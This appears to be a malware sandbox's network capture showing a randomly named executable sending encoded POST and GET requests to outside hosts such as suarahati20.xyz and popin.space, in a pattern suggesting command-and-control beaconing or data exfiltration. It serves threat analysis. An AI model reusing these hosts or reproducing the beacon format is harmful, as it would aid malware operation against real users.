                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 73 54 2f 63 30 56 6f 6c 37 72 68 53 6a 48 30 30 56 6c 6d 34 42 6e 37 36 56 54 36 6a 7a 52 53 4a 72 50 49 59 4e 4a 75 73 79 4e 4e 67 6b 59 68 34 4e 53 51 59 4c 6c 37 6b 37 31 78 70 38 6d 50 75 54 6d 53 6a 4e 37 52 55 56 51 72 53 48 59 77 79 42 58 30 2b 45 63 52 4c 4e 54 73 4c 33 7a 53 66 68 37 35 63 32 58 7a 63 41 4c 62 31 6f 5a 44 34 51 50 50 33 48 4b 77 41 51 47 41 76 79 75 6c 47 6c 58 4b 44 33 58 63 30 58 71 48 6f 30 48 50 62 53 44 33 67 68 70 70 2f 72 33 77 31 49 69 63 32 50 79 52 34 36 72 65 73 56 4a 51 67 42 4e 6a 4c 5a 6f 4c 78 31 43 50 6a 4e 69 6e 57 4b 32 2f 6f 73 49 61 30 6e 71 41 77 2b 39 59 37 62 65 2f 47 6d 79 44 69 68 65 6e 36 79 44 4a 78 5a 59 55 68 44 53 2b 62 35 52 67 4f 50 6f 36 7a 73 48 51 4e 39 2f 71 68 4a 59 4d 54 7a 55 33 38 36 51 2b 5a 52 58 59 4b 78 4f 51 52 6b 54 6d 34 4d 58 6a 72 6c 53 57 4d 68 61 62 70 50 50 4f 44 41 6f 6f 54 63 6f 36 65 73 44 74 33 38 50 56 71 52 79 4b 6c 39 71 73 68 66 52 71 68 77 71 74 30 65 63 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=f07BeQ/6F/4ysT/c0Vol7rhSjH00Vlm4Bn76VT6jzRSJrPIYNJusyNNgkYh4NSQYLl7k71xp8mPuTmSjN7RUVQrSHYwyBX0+EcRLNTsL3zSfh75c2XzcALb1oZD4QPP3HKwAQGAvyulGlXKD3Xc0XqHo0HPbSD3ghpp/r3w1Iic2PyR46resVJQgBNjLZoLx1CPjNinWK2/osIa0nqAw+9Y7be/GmyDihen6yDJxZYUhDS+b5RgOPo6zsHQN9/qhJYMTzU386Q+ZRXYKxOQRkTm4MXjrlSWMhabpPPODAooTco6esDt38PVqRyKl9qshfRqhwqt0ecFu17nKkVuZVmCX1tIZUcicr+5/gZpJ9ZYIlWMhKo7kFpRdJ80Ue2opAKceswW0mY0jJr3Zu142ier+FbqgFYgd106OG+36j8PG9BovMlQcEQu633gY39W6lc/d++xE5E0jeiSqbPunilDFMOd/nGDGnUqfgkI9Thae+sOsF09ckQJIqP2DVp0mIykkFmwLU7rWODICAY0fDLKaRd5sroOQlquwGoHtDAxVyx9BDugoR/AEgh/5D0LsRDOsxScz25LyEZRvItPDIysEai/AcEUPT3aRX73F0hs3+QtiD5ECY+ERiFNlXFmBQ6DBpyDWExDD6nXe0X9IL0ETZMGXpP1bF20fHczhp6qm7WMciIVyYckEW0sIZ5WohrSnChvTx2mr4Z4vP45RlPBoaLAlYIdQM9pJdchu5MDaYLbl1uz/FrSLuk6E4FZawYuF2cVEaZFoWXILJKmhorgtwFWvfOdWpjmZIMy3+ozQ6iVdM3wzAtnwjnG/+zY8VKehKevQx427OWnCVAzPJaxLmDRKRhXfgIgAyimuy9FAUbZnalEDob8JUItplaOVQrr+ys3g1S8lGU9Foy98ZjpsfNSsIjQjnHH985o7xAiZhIqtwOQ25qnQjh+hoGOz/iE1SgZOooewIa4vtEX72bXxi/NpA/exYDWb5G8G46m1 [TRUNCATED]
                                                              Sep 25, 2024 09:16:21.858835936 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:16:20 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1110
                                                              x-request-id: 2d6ce191-1ea0-4f8f-847a-b67e3c5f2a90
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                              set-cookie: parking_session=2d6ce191-1ea0-4f8f-847a-b67e3c5f2a90; expires=Wed, 25 Sep 2024 07:31:21 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6e 6b 45 65 79 57 74 59 38 67 67 59 56 72 30 4c 50 61 34 6f 77 74 32 67 61 61 38 55 36 32 69 76 62 7a 45 59 35 4f 31 4b 4d 39 63 32 2f 32 39 49 57 33 57 50 57 53 4f 42 36 42 49 76 36 4a 74 6d 6f 39 63 65 36 75 66 77 2b 46 50 62 67 2f 2f 74 48 6c 6d 48 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:16:21.858859062 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmQ2Y2UxOTEtMWVhMC00ZjhmLTg0N2EtYjY3ZTNjNWYyYTkwIiwicGFnZV90aW1lIjoxNzI3MjQ4NT


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.849717199.59.243.227806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:23.964817047 CEST471OUTGET /x7gz/?FvypB=88kTDXb8k4dH&Ux_TPFo=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.popin.space
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:16:24.413008928 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:16:24 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1502
                                                              x-request-id: 20ad8616-28cf-4686-9934-198f634a9ab7
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NwZfCdFvCuH/zuHzLDEPLbeutYJLo7Ai1HPPWyZAsgQJpmmYNZZvuKlrDErbH2N/rCPZGp0pEFi9Q6oJt1rTcQ==
                                                              set-cookie: parking_session=20ad8616-28cf-4686-9934-198f634a9ab7; expires=Wed, 25 Sep 2024 07:31:24 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4e 77 5a 66 43 64 46 76 43 75 48 2f 7a 75 48 7a 4c 44 45 50 4c 62 65 75 74 59 4a 4c 6f 37 41 69 31 48 50 50 57 79 5a 41 73 67 51 4a 70 6d 6d 59 4e 5a 5a 76 75 4b 6c 72 44 45 72 62 48 32 4e 2f 72 43 50 5a 47 70 30 70 45 46 69 39 51 36 6f 4a 74 31 72 54 63 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NwZfCdFvCuH/zuHzLDEPLbeutYJLo7Ai1HPPWyZAsgQJpmmYNZZvuKlrDErbH2N/rCPZGp0pEFi9Q6oJt1rTcQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:16:24.413028002 CEST955INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjBhZDg2MTYtMjhjZi00Njg2LTk5MzQtMTk4ZjYzNGE5YWI3IiwicGFnZV90aW1lIjoxNzI3MjQ4NT


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.849718198.252.106.191806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:29.737099886 CEST734OUTPOST /tuad/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.suarahati20.xyz
                                                              Origin: http://www.suarahati20.xyz
                                                              Referer: http://www.suarahati20.xyz/tuad/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 50 4d 35 64 2b 75 37 4f 39 42 63 63 59 48 45 2f 77 4a 2f 78 62 77 75 72 34 6b 31 38 78 56 56 36 42 66 65 47 62 77 76 56 65 39 59 4e 6d 4a 71 42 69 45 4c 61 62 56 6c 47 43 4e 4d 56 59 71 5a 69 4c 73 43 2b 6c 70 31 4f 51 39 54 54 68 46 71 75 75 64 59 72 43 43 51 78 6c 64 65 45 56 79 58 51 4f 61 4d 6e 68 43 44 5a 42 78 31 55 48 4f 79 46 6b 4f 30 63 77 4f 77 72 55 6c 41 54 59 30 62 66 53 39 52 68 56 36 67 6f 48 54 2f 33 58 2b 67 39 6d 79 52 58 74 55 54 50 75 5a 62 54 33 5a 54 6a 61 68 66 75 46 70 67 63 77 68 30 5a 75 41 55 5a 36 54 34 6a 53 65 41 31 52 74 47 79 47 58 50 50 46 72 52 62 6c 51 41 3d
                                                              Data Ascii: Ux_TPFo=PM5d+u7O9BccYHE/wJ/xbwur4k18xVV6BfeGbwvVe9YNmJqBiELabVlGCNMVYqZiLsC+lp1OQ9TThFquudYrCCQxldeEVyXQOaMnhCDZBx1UHOyFkO0cwOwrUlATY0bfS9RhV6goHT/3X+g9myRXtUTPuZbT3ZTjahfuFpgcwh0ZuAUZ6T4jSeA1RtGyGXPPFrRblQA=
                                                              Sep 25, 2024 09:16:30.318598986 CEST1033INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 796
                                                              date: Wed, 25 Sep 2024 07:16:30 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.849719198.252.106.191806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:32.276554108 CEST754OUTPOST /tuad/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.suarahati20.xyz
                                                              Origin: http://www.suarahati20.xyz
                                                              Referer: http://www.suarahati20.xyz/tuad/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 50 4d 35 64 2b 75 37 4f 39 42 63 63 43 6d 30 2f 32 75 54 78 64 51 75 71 7a 45 31 38 6d 46 56 6d 42 66 43 47 62 77 48 46 66 4f 38 4e 6d 6f 61 42 6c 41 66 61 58 31 6c 47 4e 74 4d 51 63 71 5a 6c 4c 73 48 65 6c 70 4a 4f 51 39 58 54 68 41 57 75 76 71 30 30 45 43 51 7a 38 4e 65 61 57 43 58 51 4f 61 4d 6e 68 42 2b 32 42 31 5a 55 45 37 36 46 6b 76 30 44 76 2b 77 73 63 46 41 54 53 55 61 57 53 39 52 54 56 37 39 7a 48 56 6a 33 58 38 34 39 6d 6a 52 59 6b 55 54 4a 78 4a 61 63 32 5a 6d 66 41 47 6e 49 43 70 6f 49 34 48 6f 55 69 57 35 7a 67 78 77 6c 52 65 6f 65 52 75 75 45 44 67 53 6e 66 49 42 72 37 48 55 78 71 5a 55 47 62 34 69 62 54 75 37 54 65 78 6e 5a 33 2b 44 4f
                                                              Data Ascii: Ux_TPFo=PM5d+u7O9BccCm0/2uTxdQuqzE18mFVmBfCGbwHFfO8NmoaBlAfaX1lGNtMQcqZlLsHelpJOQ9XThAWuvq00ECQz8NeaWCXQOaMnhB+2B1ZUE76Fkv0Dv+wscFATSUaWS9RTV79zHVj3X849mjRYkUTJxJac2ZmfAGnICpoI4HoUiW5zgxwlReoeRuuEDgSnfIBr7HUxqZUGb4ibTu7TexnZ3+DO
                                                              Sep 25, 2024 09:16:32.849601030 CEST1033INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 796
                                                              date: Wed, 25 Sep 2024 07:16:32 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.849720198.252.106.191806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:34.821712017 CEST1771OUTPOST /tuad/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.suarahati20.xyz
                                                              Origin: http://www.suarahati20.xyz
                                                              Referer: http://www.suarahati20.xyz/tuad/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 50 4d 35 64 2b 75 37 4f 39 42 63 63 43 6d 30 2f 32 75 54 78 64 51 75 71 7a 45 31 38 6d 46 56 6d 42 66 43 47 62 77 48 46 66 4f 30 4e 6d 65 75 42 6a 68 66 61 57 31 6c 47 41 4e 4d 52 63 71 5a 34 4c 73 2f 42 6c 70 46 34 51 2f 66 54 6a 69 75 75 6d 2b 67 30 52 79 51 7a 68 64 65 62 56 79 58 42 4f 62 38 6a 68 43 47 32 42 31 5a 55 45 36 4b 46 30 75 30 44 70 2b 77 72 55 6c 41 58 59 30 61 2b 53 35 30 6d 56 34 51 47 45 6a 54 33 58 63 6f 39 6b 52 35 59 72 55 54 4c 79 4a 62 44 32 5a 36 36 41 47 54 75 43 6f 73 69 34 41 45 55 68 68 4d 75 39 53 4a 37 45 50 67 38 4b 65 53 4f 61 6a 6a 43 65 72 52 2f 6e 51 77 7a 38 63 64 74 61 70 6d 68 58 6f 4c 47 42 55 37 32 33 37 69 36 42 5a 53 61 2b 65 61 67 67 58 30 76 69 78 54 2f 4e 6d 55 6d 44 42 4e 44 31 41 57 71 71 4f 46 78 46 68 34 72 71 34 51 35 2b 54 6d 52 53 74 78 7a 6b 33 4d 61 58 36 54 76 54 52 54 50 38 32 35 75 52 4d 37 66 37 46 4c 4d 48 55 67 54 48 5a 6d 78 6d 4d 70 7a 4c 68 76 37 55 71 30 43 34 62 2f 41 47 64 6c 41 31 4f 65 4f 49 6b 69 38 57 70 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=PM5d+u7O9BccCm0/2uTxdQuqzE18mFVmBfCGbwHFfO0NmeuBjhfaW1lGANMRcqZ4Ls/BlpF4Q/fTjiuum+g0RyQzhdebVyXBOb8jhCG2B1ZUE6KF0u0Dp+wrUlAXY0a+S50mV4QGEjT3Xco9kR5YrUTLyJbD2Z66AGTuCosi4AEUhhMu9SJ7EPg8KeSOajjCerR/nQwz8cdtapmhXoLGBU7237i6BZSa+eaggX0vixT/NmUmDBND1AWqqOFxFh4rq4Q5+TmRStxzk3MaX6TvTRTP825uRM7f7FLMHUgTHZmxmMpzLhv7Uq0C4b/AGdlA1OeOIki8WpHrtE5Kq6r0qvlpyQoyLO4lccrTVYUmnOGvGq37OAWgQ3LoFJdi4ZEhW7zrkL+/mL6o63+nqVNQTEwTgU27DFiBgpYQqxTbxBAA7aUldbiSE/M073GadDeVkyZFG7pPie4TD3l50+VoVHBJ9aWdyKKgqR1fxzo1BEJzq2MxCuLEqNEjNw2YTniOLtzBZV0ZBm6bhxNtUVeerAPqvobcY92Ld4ID4bXH/eIB/IGwdSnMgcuu1hM8P1aWllCpyygILMi9fIJvOrQ/ScoWUijDRtPRjpuBORghkPnIIc+tIf0fmJraCmLulGTnVkF3i+wUZskSAnBFiTXSEbf7P6jede9UzsgKKFyoIjpT6s7L5TSsl8F02HKj2wWaqWJ4MDEWv/OFaO2LL60YUiO9zBLGPy7UAZ2dW/oiC9aI521Nx/F+fINtltSgLLt9qIx21Yc7lp5o957OPj21TUiG4vEvFEPSz+Q4IXpv7Rwq1UA7TMZGttRu5En2BPgDrHOsCYmEzs5xmchxWVCkeugHzrL9iM5CbdpNiRrqEd7bBjcrzDjHZ9jPjllmdPnA52jxAXkhoTMU4Bzc/qxh6OqVLT2L1+eRQQt+Iq36dwrdoBY7fWwoXJ0OSAmkL9t39VJeoQj9TGg84tN+uaLS4uBKFS2rRNpiZY6CncBOs1yE [TRUNCATED]
                                                              Sep 25, 2024 09:16:35.391519070 CEST1033INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 796
                                                              date: Wed, 25 Sep 2024 07:16:35 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
